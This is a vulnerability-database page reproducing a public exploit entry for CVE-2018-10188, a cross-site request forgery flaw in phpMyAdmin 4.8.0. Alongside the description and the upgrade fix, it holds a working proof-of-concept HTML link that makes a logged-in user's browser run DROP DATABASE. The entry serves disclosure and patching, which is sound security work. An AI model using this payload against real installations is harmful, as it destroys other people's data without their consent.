Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-10188

Publish Date: 23 Apr 2018

Author: revengsh

                # Exploit Title: phpMyAdmin 4.8.0 &lt; 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh &amp; @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps


#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.


&lt;html&gt;
  &lt;body&gt;
    &lt;a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]"&gt;
      Drop database
    &lt;/a&gt;
  &lt;/body&gt;
&lt;/html&gt;

#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery

Vulmon Search

About

Products

Connect